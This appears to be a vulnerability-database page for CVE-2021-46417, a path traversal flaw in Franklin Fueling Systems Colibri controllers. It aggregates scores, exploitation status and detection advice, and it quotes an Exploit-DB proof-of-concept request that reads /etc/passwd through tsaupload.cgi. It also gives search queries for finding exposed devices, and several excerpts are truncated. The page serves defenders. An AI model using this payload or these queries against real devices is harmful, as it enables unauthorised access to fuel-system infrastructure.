CVE-2021-46417
published 2022-04-07CVE-2021-46417: Insecure handling of a download function leads to disclosure of internal files due to path traversal with root privileges in Franklin Fueling Systems Colibri…
PriorityP183high7.5CVSS 3.1
AVNACLPRNUINSUCHINAN
ITWEXPLOITVulnCheck KEVInitial access
Exploited in the wild
EPSS
59.75%
99.0th percentile
Insecure handling of a download function leads to disclosure of internal files due to path traversal with root privileges in Franklin Fueling Systems Colibri Controller Module 1.8.19.8580.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| franklinfueling | colibri_firmware | — | — |
Detection & IOCsextracted from sources · hover to see the quote
urlhttp://192.168.1.6/18198580/cgi-bin/tsaupload.cgi?file_name=../../../../../..//etc/passwd&password=↗
yara↗
regex: root:.*:0:0:
- →Detect exploitation attempts by monitoring HTTP GET requests to /cgi-bin/tsaupload.cgi containing path traversal sequences (../../) in the file_name parameter, particularly targeting /etc/passwd. ↗
- →Shodan/FOFA queries can identify exposed Franklin Fueling Systems Colibri devices: search for http.html:"Franklin Fueling Systems" or body="franklin fueling systems". ↗
- →Successful exploitation returns a response body matching the Unix passwd file pattern; detect by inspecting HTTP responses for the regex root:.*:0:0: from the tsaupload.cgi endpoint. ↗
- →The vulnerable CGI script tsaupload.cgi is accessible without authentication (empty password parameter), indicating unauthenticated path traversal is possible. ↗
- ·The path traversal payload uses a double leading slash (//etc/passwd) after the traversal sequence, which may be relevant for WAF/IDS signature tuning to avoid false negatives. ↗
- ·The vulnerable endpoint path includes the firmware version string as a prefix directory (18198580), which corresponds to version 1.8.19.8580; detection rules should account for this version-specific path segment. ↗
- ·The Nuclei template uses a base URL path without the version prefix (/cgi-bin/tsaupload.cgi), suggesting the endpoint may also be reachable without the version directory prefix. ↗
CVSS provenance
nvdv3.17.5HIGHCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
nvdv2.07.8HIGHAV:N/AC:L/Au:N/C:C/I:N/A:N
vulncheck7.5HIGH
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
GHSA
GHSA-wcqr-93w9-8g64: Insecure handling of a download function leads to disclosure of internal files due to path traversal with root privileges in Franklin Fueling Systems
ghsa_unreviewed·2022-04-08
CVE-2021-46417 [HIGH] CWE-22 GHSA-wcqr-93w9-8g64: Insecure handling of a download function leads to disclosure of internal files due to path traversal with root privileges in Franklin Fueling Systems
Insecure handling of a download function leads to disclosure of internal files due to path traversal with root privileges in Franklin Fueling Systems Colibri Controller Module 1.8.19.8580.
VulnCheck
franklinfueling colibri_firmware Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')
vulncheck·2021·CVSS 7.5
CVE-2021-46417 [HIGH] franklinfueling colibri_firmware Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')
franklinfueling colibri_firmware Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')
Insecure handling of a download function leads to disclosure of internal files due to path traversal with root privileges in Franklin Fueling Systems Colibri Controller Module 1.8.19.8580.
Affected: franklinfueling colibri_firmware
Required Action: Apply remediations or mitigations per vendor instructions or discontinue use of the product if remediation or mitigations are unavailable.
Exploitation References: https://dashboard.shadowserver.org/statistics/honeypot/vulnerability/map/?day=2023-11-17&host_type=src&vulnerability=cve-2021-46417; https://dashboard.shadowserver.org/statistics/honeypot/vulnerability/map/?day=2023-11-19&host_type=src&vulnerability=cve-2021-46417; https
No detection rules found.
Exploit-DB
Franklin Fueling Systems Colibri Controller Module 1.8.19.8580 - Local File Inclusion (LFI)
exploitdb·2022-04-11·CVSS 7.5
CVE-2021-46417 [HIGH] Franklin Fueling Systems Colibri Controller Module 1.8.19.8580 - Local File Inclusion (LFI)
Franklin Fueling Systems Colibri Controller Module 1.8.19.8580 - Local File Inclusion (LFI)
---
# Exploit Title: Franklin Fueling Systems Colibri Controller Module 1.8.19.8580 - Local File Inclusion (LFI)
# Date: 7/4/2022
# Exploit Author: Momen Eldawakhly (Cyber Guy)
# Vendor Homepage: https://www.franklinfueling.com/
# Version: 1.8.19.8580
# Tested on: Linux [Firefox]
# CVE : CVE-2021-46417
# Proof of Concept
============[ HTTP Exploitation ]============
GET /18198580/cgi-bin/tsaupload.cgi?file_name=../../../../../..//etc/passwd&password= HTTP/1.1
Host: 192.168.1.6
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept
Nuclei
Franklin Fueling Systems Colibri Controller Module 1.8.19.8580 - Local File Inclusion
nuclei·CVSS 7.5
CVE-2021-46417 [HIGH] Franklin Fueling Systems Colibri Controller Module 1.8.19.8580 - Local File Inclusion
Franklin Fueling Systems Colibri Controller Module 1.8.19.8580 - Local File Inclusion
Franklin Fueling Systems Colibri Controller Module 1.8.19.8580 is susceptible to local file inclusion because of insecure handling of a download function that leads to disclosure of internal files due to path traversal with root privileges.
Template:
id: CVE-2021-46417
info:
name: Franklin Fueling Systems Colibri Controller Module 1.8.19.8580 - Local File Inclusion
author: For3stCo1d
severity: high
description: |
Franklin Fueling Systems Colibri Controller Module 1.8.19.8580 is susceptible to local file inclusion because of insecure handling of a download function that leads to disclosure of internal files due to path traversal with root privileges.
impact: |
Successful exploitation of this vulnerabil
Greynoiseio
NoiseLetter October 2025
blogs_greynoiseio
NoiseLetter October 2025
CVE Disclosure Early Warning Get an early warning when traffic spikes indicate a high likelihood of new disclosures
Compromised Asset Detection Find out immediately if an asset communicates with a malicious IP address
Vulnerability Prioritization Get real-time insight into active exploitation trends to better understand risk and severity
SOC Efficiency Filter out noisy, low priority and false-positive alerts from mass internet scanners
Incident Investigation Add context to incidents to speed the determinations of scope and timelines
Threat Hunting Quickly identify anomalous behavior and enrich your threat hunting campaigns
Why GreyNoise
CVE Disclosure Early Warning Get an early warning when traffic spikes indicate a high likelihood of new disclosures
Compromised Asset Detection Fin
arXiv
SecScore: Enhancing the CVSS Threat Metric Group with Empirical Evidences
arxiv_fulltext·2024-05-14
SecScore: Enhancing the CVSS Threat Metric Group with Empirical Evidences
: Enhancing the CVSS Threat Metric Group with Empirical Evidences
Miguel Santana
Banco de PortugalPortugal
Vinicius V. Cogo
LASIGE, Informática, Faculdade de Ciências, Universidade de LisboaPortugal
Alan Oliveira de Sá
LASIGE, Informática, Faculdade de Ciências, Universidade de LisboaPortugal
printfolios=true
## Abstract
Background: Timely prioritising and remediating vulnerabilities are paramount in the dynamic cybersecurity field, and one of the most widely used vulnerability scoring systems (CVSS) does not address the increasing likelihood of emerging an exploit code.
Aims: We present , an innovative vulnerability severity score that enhances CVSS Threat metric group with statistical models from empirical evidences of real-world exploit codes.
Method: adjusts the traditional
http://packetstormsecurity.com/files/166610/FFS-Colibri-Controller-Module-1.8.19.8580-Directory-Traversal.htmlhttp://packetstormsecurity.com/files/166671/Franklin-Fueling-Systems-Colibri-Controller-Module-1.8.19.8580-Local-File-Inclusion.htmlhttps://drive.google.com/drive/folders/1Yu4aVDdrgvs-F9jP3R8Cw7qo_TC7VB-Rhttp://packetstormsecurity.com/files/166610/FFS-Colibri-Controller-Module-1.8.19.8580-Directory-Traversal.htmlhttp://packetstormsecurity.com/files/166671/Franklin-Fueling-Systems-Colibri-Controller-Module-1.8.19.8580-Local-File-Inclusion.htmlhttps://drive.google.com/drive/folders/1Yu4aVDdrgvs-F9jP3R8Cw7qo_TC7VB-R
2022-04-07
Published
Exploited in the wild